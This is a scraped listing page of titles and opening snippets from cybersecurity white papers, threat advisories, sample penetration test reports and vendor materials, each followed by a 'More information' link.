The Weakest Link: Mitigating Web Application Vulnerabilities webscurity White Paper webscurity Inc. Minneapolis, Minnesota USA January 25, 2007 Contents Executive Summary...3 Introduction...4 Target Audience...4
More informationWhat s Wrong with Information Security Today? You are looking in the wrong places for the wrong things.
What s Wrong with Information Security Today? You are looking in the wrong places for the wrong things. AGENDA Current State of Information Security Data Breach Statics Data Breach Case Studies Why current
More information76% Secunia Vulnerability Review. Key figures and facts from a global IT-Security perspective. Published February 26, 2014. secunia.
Secunia Vulnerability Review 2014 Key figures and facts from a global IT-Security perspective Published February 26, 2014 76% Browser Vulnerabilities 7540 893 7540 731 7540 727 7540 441 7540 208 7540 207
More information[state of the internet] / SEO Attacks. Threat Advisory: Continuous Uptick in SEO Attacks
TLP: GREEN Issue Date: 1.12.16 Threat Advisory: Continuous Uptick in SEO Attacks Risk Factor High The Akamai Threat Research Team has identified a highly sophisticated Search Engine Optimization (SEO)
More informationWhy The Security You Bought Yesterday, Won t Save You Today
9th Annual Courts and Local Government Technology Conference Why The Security You Bought Yesterday, Won t Save You Today Ian Robertson Director of Information Security Michael Gough Sr. Risk Analyst About
More informationBlack Box Penetration Testing For GPEN.KM V1.0 Month dd "#$!%&'(#)*)&'+!,!-./0!.-12!1.03!0045!.567!5895!.467!:;83!-/;0!383;!
Sample Penetration Testing Report Black Box Penetration Testing For GPEN.KM V1.0 Month dd "#$%&'#)*)&'+,-./0.-121.030045.5675895.467:;83-/;0383; th, yyyy A&0#0+4*M:+:#&*#0%+C:,#0+4N:
More information2015 TRUSTWAVE GLOBAL SECURITY REPORT
2015 TRUSTWAVE GLOBAL SECURITY REPORT Rahul Samant Trustwave Australia WHY DO CYBERCRIMINALS DO WHAT THEY DO? 1,425% Return on Investment (ROI) Estimated ROI for a one-month ransomware campaign Based on
More informationBeyond Aurora s Veil: A Vulnerable Tale
Beyond Aurora s Veil: A Vulnerable Tale Derek Manky Cyber Security & Threat Research FortiGuard Labs October 26th, 2010: SecTor 2010 Toronto, CA Conficker: April Doomsday.. Meanwhile JBIG2 Zero Day PDF/SWF
More informationUNCLASSIFIED. Briefing to Critical Infrastructure Sector Organizations on the Canadian Cyber Incident Response Centre (CCIRC)
Briefing to Critical Infrastructure Sector Organizations on the Canadian Cyber Incident Response Centre (CCIRC) Cyber in the News 1 Tactics, Techniques and Procedures These observed tactics, techniques
More information2016 Trends in Cybersecurity: A Quick Guide to the Most Important Insights in Security
2016 Trends in Cybersecurity: A Quick Guide to the Most Important Insights in Security For 10 years, Microsoft has been studying and analyzing the threat landscape of exploits, vulnerabilities, and malware.
More informationLast update: February 23, 2004
Last update: February 23, 2004 Web Security Glossary The Web Security Glossary is an alphabetical index of terms and terminology relating to web application security. The purpose of the Glossary is to
More informationIBM Advanced Threat Protection Solution
IBM Advanced Threat Protection Solution Fabio Panada IBM Security Tech Sales Leader 1 Advanced Threats is one of today s key mega-trends Advanced Threats Sophisticated, targeted attacks designed to gain
More informationKeyword: Cloud computing, service model, deployment model, network layer security.
Volume 4, Issue 2, February 2014 ISSN: 2277 128X International Journal of Advanced Research in Computer Science and Software Engineering Research Paper Available online at: www.ijarcsse.com An Emerging
More informationIBM X-Force 2012 Cyber Security Threat Landscape
IBM X-Force 2012 Cyber Security Threat Landscape 1 2012 IBM Corporation Agenda Overview Marketing & Promotion Highlights from the 2011 IBM X-Force Trend and Risk Report New attack activity Progress in
More informationPenetration Test Report
Penetration Test Report MegaCorp One August 10 th, 2013 Offensive Security Services, LLC 19706 One Norman Blvd. Suite B #253 Cornelius, NC 28031 United States of America Tel: 1-402-608-1337 Fax: 1-704-625-3787
More informationLocking down a Hitachi ID Suite server
Locking down a Hitachi ID Suite server 2016 Hitachi ID Systems, Inc. All rights reserved. Organizations deploying Hitachi ID Identity and Access Management Suite need to understand how to secure its runtime
More informationelearning for Secure Application Development
elearning for Secure Application Development Curriculum Application Security Awareness Series 1-2 Secure Software Development Series 2-8 Secure Architectures and Threat Modeling Series 9 Application Security
More informationMicrosoft Security Intelligence Report volume 7 (January through June 2009)
Microsoft Security Intelligence Report volume 7 (January through June 2009) Key Findings Summary Volume 7 of the Microsoft Security Intelligence Report provides an in-depth perspective on malicious and
More informationSitefinity Security and Best Practices
Sitefinity Security and Best Practices Table of Contents Overview The Ten Most Critical Web Application Security Risks Injection Cross-Site-Scripting (XSS) Broken Authentication and Session Management
More informationAlert (TA14-212A) Backoff Point-of-Sale Malware
Alert (TA14-212A) Backoff Point-of-Sale Malware Original release date: July 31, 2014 Systems Affected Point-of-Sale Systems Overview This advisory was prepared in collaboration with the National Cybersecurity
More informationSANS Top 20 Critical Controls for Effective Cyber Defense
WHITEPAPER SANS Top 20 Critical Controls for Cyber Defense SANS Top 20 Critical Controls for Effective Cyber Defense JANUARY 2014 SANS Top 20 Critical Controls for Effective Cyber Defense Summary In a
More informationIs Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security
Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security Presented 2009-05-29 by David Strauss Thinking Securely Security is a process, not
More informationAdvanced Systems Security
Systems and Internet Infrastructure Security Network and Security Research Center Department of Computer Science and Engineering Pennsylvania State University, University Park PA Advanced Systems Security
More informationSPEAR PHISHING UNDERSTANDING THE THREAT
SPEAR PHISHING UNDERSTANDING THE THREAT SEPTEMBER 2013 Due to an organisation s reliance on email and internet connectivity, there is no guaranteed way to stop a determined intruder from accessing a business
More informationKASPERSKY SECURITY INTELLIGENCE SERVICES. EXPERT SERVICES. www.kaspersky.com
KASPERSKY SECURITY INTELLIGENCE SERVICES. EXPERT SERVICES www.kaspersky.com EXPERT SERVICES Expert Services from Kaspersky Lab are exactly that the services of our in-house experts, many of them global
More informationFINAL DoIT 11.03.2015 - v.4 PAYMENT CARD INDUSTRY DATA SECURITY STANDARDS APPLICATION DEVELOPMENT AND MAINTENANCE PROCEDURES
Purpose: The Department of Information Technology (DoIT) is committed to developing secure applications. DoIT s System Development Methodology (SDM) and Application Development requirements ensure that
More informationWeb Engineering Web Application Security Issues
Security Issues Dec 14 2009 Katharina Siorpaes Copyright 2009 STI - INNSBRUCK www.sti-innsbruck.at It is NOT Network Security It is securing: Custom Code that drives a web application Libraries Backend
More informationSecurity Awareness For Website Administrators. State of Illinois Central Management Services Security and Compliance Solutions
Security Awareness For Website Administrators State of Illinois Central Management Services Security and Compliance Solutions Common Myths Myths I m a small target My data is not important enough We ve
More informationThe Top Web Application Attacks: Are you vulnerable?
QM07 The Top Web Application Attacks: Are you vulnerable? John Burroughs, CISSP Sr Security Architect, Watchfire Solutions jburroughs@uk.ibm.com Agenda Current State of Web Application Security Understanding
More informationAN OVERVIEW OF VULNERABILITY SCANNERS
AN OVERVIEW OF VULNERABILITY SCANNERS February 2008 The Government of the Hong Kong Special Administrative Region The contents of this document remain the property of, and may not be reproduced in whole
More informationHow Web Application Security Can Prevent Malicious Attacks
Securing Enterprise Web Applications for Critical Data Protection and PCI-DSS Compliance Selecting the Right Technology is Essential in Guarding Against Malicious Attacks White_Paper As today s organizations
More informationRational AppScan & Ounce Products
IBM Software Group Rational AppScan & Ounce Products Presenters Tony Sisson and Frank Sassano 2007 IBM Corporation IBM Software Group The Alarming Truth CheckFree warns 5 million customers after hack http://infosecurity.us/?p=5168
More informationHow to achieve PCI DSS Compliance with Checkmarx Source Code Analysis
How to achieve PCI DSS Compliance with Checkmarx Source Code Analysis Document Scope This document aims to assist organizations comply with PCI DSS 3 when it comes to Application Security best practices.
More informationThe Prevalence of Flash Vulnerabilities on the Web
TECHNICAL BRIEF FLASH FLOODING The Prevalence of Flash Vulnerabilities on the Web Adobe Flash Player is a cross-platform, browser plugin that provides uncompromised viewing of expressive applications,
More informationIBM Protocol Analysis Module
IBM Protocol Analysis Module The protection engine inside the IBM Security Intrusion Prevention System technologies. Highlights Stops threats before they impact your network and the assets on your network
More informationVulnerability Management
Vulnerability Management Buyer s Guide Buyer s Guide 01 Introduction 02 Key Components 03 Other Considerations About Rapid7 01 INTRODUCTION Exploiting weaknesses in browsers, operating systems and other
More informationIBM X-Force 2012 Cyber Security Threat Landscape
IBM X-Force 2012 Cyber Security Threat Landscape Johan Celis X-Force R&D Spokesperson Security Channel Sales Leader BeNeLux 1 Mission IBM Security Systems To protect our customers from security threats
More informationFoundstone ERS remediation System
Expediting Incident Response with Foundstone ERS Foundstone Inc. August, 2003 Enterprise Risk Solutions Platform Supports Successful Response and Remediation Introduction The Foundstone Enterprise Risk
More information2012 North Dakota Information Technology Security Audit Vulnerability Assessment and Penetration Testing Summary Report
2012 North Dakota Information Technology Security Audit Vulnerability Assessment and Penetration Testing Summary Report 28 September 2012 Submitted to: Donald Lafleur IS Audit Manager ND State Auditor
More informationWHITEPAPER. Nessus Exploit Integration
Nessus Exploit Integration v2 Tenable Network Security has committed to providing context around vulnerabilities, and correlating them to other sources, such as available exploits. We currently pull information
More informationVulnerability-Focused Threat Detection: Protect Against the Unknown
Vulnerability-Focused Threat Detection: Protect Against the Unknown Vulnerabilities and threats are being discovered at a pace that traditional exploit-based attack detection technology cannot meet. Vulnerability-focused
More informationSAFECode Security Development Lifecycle (SDL)
SAFECode Security Development Lifecycle (SDL) Michael Howard Microsoft Matthew Coles EMC 15th Semi-annual Software Assurance Forum, September 12-16, 2011 Agenda Introduction to SAFECode Security Training
More informationETHICAL HACKING 010101010101APPLICATIO 00100101010WIRELESS110 00NETWORK1100011000 101001010101011APPLICATION0 1100011010MOBILE0001010 10101MOBILE0001
001011 1100010110 0010110001 010110001 0110001011000 011000101100 010101010101APPLICATIO 0 010WIRELESS110001 10100MOBILE00010100111010 0010NETW110001100001 10101APPLICATION00010 00100101010WIRELESS110
More informationDefending Against Cyber Attacks with SessionLevel Network Security
Defending Against Cyber Attacks with SessionLevel Network Security May 2010 PAGE 1 PAGE 1 Executive Summary Threat actors are determinedly focused on the theft / exfiltration of protected or sensitive
More informationMedical Device Security Health Imaging Digital Capture. Security Assessment Report for the Kodak DryView 8150 Imager Release 1.0.
Medical Device Security Health Imaging Digital Capture Security Assessment Report for the Kodak DryView 8150 Imager Release 1.0 Page 1 of 9 Table of Contents Table of Contents... 2 Executive Summary...
More informationWeb Application Security
Chapter 1 Web Application Security In this chapter: OWASP Top 10..........................................................2 General Principles to Live By.............................................. 4
More informationAdobe Systems Incorporated
Adobe Connect 9.2 Page 1 of 8 Adobe Systems Incorporated Adobe Connect 9.2 Hosted Solution June 20 th 2014 Adobe Connect 9.2 Page 2 of 8 Table of Contents Engagement Overview... 3 About Connect 9.2...
More informationWhite Paper THE FOUR ATTACK VECTORS TO PREVENT OR DETECT RETAILER BREACHES. By James Christiansen, VP, Information Risk Management
White Paper THE FOUR ATTACK VECTORS TO PREVENT OR DETECT RETAILER BREACHES By James Christiansen, VP, Information Risk Management Executive Summary Security breaches in the retail sector are becoming more
More informationSAST, DAST and Vulnerability Assessments, 1+1+1 = 4
SAST, DAST and Vulnerability Assessments, 1+1+1 = 4 Gordon MacKay Digital Defense, Inc. Chris Wysopal Veracode Session ID: Session Classification: ASEC-W25 Intermediate AGENDA Risk Management Challenges
More informationStreamlining Web and Email Security
How to Protect Your Business from Malware, Phishing, and Cybercrime The SMB Security Series Streamlining Web and Email Security sponsored by Introduction to Realtime Publishers by Don Jones, Series Editor
More information2. From a control perspective, the PRIMARY objective of classifying information assets is to:
MIS5206 Week 13 Your Name Date 1. When conducting a penetration test of an organization's internal network, which of the following approaches would BEST enable the conductor of the test to remain undetected
More informationSecure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda
Secure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda 1. Introductions for new members (5 minutes) 2. Name of group 3. Current
More informationDEFENSE THROUGHOUT THE VULNERABILITY LIFE CYCLE WITH ALERT LOGIC THREAT AND LOG MANAGER
DEFENSE THROUGHOUT THE VULNERABILITY LIFE CYCLE WITH ALERT LOGIC THREAT AND Introduction > New security threats are emerging all the time, from new forms of malware and web application exploits that target
More informationHardening Joomla 1. HARDENING PHP. 1.1 Installing Suhosin. 1.2 Disable Remote Includes. 1.3 Disable Unneeded Functions & Classes
1. HARDENING PHP Hardening Joomla 1.1 Installing Suhosin Suhosin is a PHP Hardening patch which aims to protect the PHP engine and runtime environment from common exploits, such as buffer overflows in
More informationProtecting against DoS/DDoS Attacks with FortiWeb Web Application Firewall
Protecting against DoS/DDoS Attacks with FortiWeb Web Application Firewall A FORTINET WHITE PAPER www.fortinet.com Introduction Denial of Service attacks are rapidly becoming a popular attack vector used
More informationConcierge SIEM Reporting Overview
Concierge SIEM Reporting Overview Table of Contents Introduction... 2 Inventory View... 3 Internal Traffic View (IP Flow Data)... 4 External Traffic View (HTTP, SSL and DNS)... 5 Risk View (IPS Alerts
More informationV ISA SECURITY ALERT 13 November 2015
V ISA SECURITY ALERT 13 November 2015 U P DATE - CYBERCRIMINALS TARGE TING POINT OF SALE INTEGRATORS Distribution: Value-Added POS Resellers, Merchant Service Providers, Point of Sale Providers, Acquirers,
More informationIBM Managed Security Services Vulnerability Scanning:
IBM Managed Security Services August 2005 IBM Managed Security Services Vulnerability Scanning: Understanding the methodology and risks Jerry Neely Network Security Analyst, IBM Global Services Page 2
More informationPenetration Test Report
Penetration Test Report Acme Test Company ACMEIT System 26 th November 2010 Executive Summary Info-Assure Ltd was engaged by Acme Test Company to perform an IT Health Check (ITHC) on the ACMEIT System
More informationWeb Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability
Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability WWW Based upon HTTP and HTML Runs in TCP s application layer Runs on top of the Internet Used to exchange
More informationArcGIS Server Security Threats & Best Practices 2014. David Cordes Michael Young
ArcGIS Server Security Threats & Best Practices 2014 David Cordes Michael Young Agenda Introduction Threats Best practice - ArcGIS Server settings - Infrastructure settings - Processes Summary Introduction
More informationWEB ATTACKS AND COUNTERMEASURES
WEB ATTACKS AND COUNTERMEASURES February 2008 The Government of the Hong Kong Special Administrative Region The contents of this document remain the property of, and may not be reproduced in whole or in
More informationHow To Prevent Hacker Attacks With Network Behavior Analysis
E-Guide Signature vs. anomaly-based behavior analysis News of successful network attacks has become so commonplace that they are almost no longer news. Hackers have broken into commercial sites to steal
More informationSecure Your Mobile Workplace
Secure Your Mobile Workplace Sunny Leung Senior System Engineer Symantec 3th Dec, 2013 1 Agenda 1. The Threats 2. The Protection 3. Q&A 2 The Mobile Workplaces The Threats 4 Targeted Attacks up 42% in
More informationSECURITY REIMAGINED SPEAR PHISHING ATTACKS WHY THEY ARE SUCCESSFUL AND HOW TO STOP THEM. Why Automated Analysis Tools are not Created Equal
WHITE PAPER SPEAR PHISHING ATTACKS WHY THEY ARE SUCCESSFUL AND HOW TO STOP THEM Why Automated Analysis Tools are not Created Equal SECURITY REIMAGINED CONTENTS Executive Summary...3 Introduction: The Rise
More informationCross-Site Scripting
Cross-Site Scripting (XSS) Computer and Network Security Seminar Fabrice Bodmer (fabrice.bodmer@unifr.ch) UNIFR - Winter Semester 2006-2007 XSS: Table of contents What is Cross-Site Scripting (XSS)? Some
More informationCOORDINATED THREAT CONTROL
APPLICATION NOTE COORDINATED THREAT CONTROL Interoperability of Juniper Networks IDP Series Intrusion Detection and Prevention Appliances and SA Series SSL VPN Appliances Copyright 2010, Juniper Networks,
More informationWeb App Security Audit Services
locuz.com Professional Services Web App Security Audit Services The unsecured world today Today, over 80% of attacks against a company s network come at the Application Layer not the Network or System
More information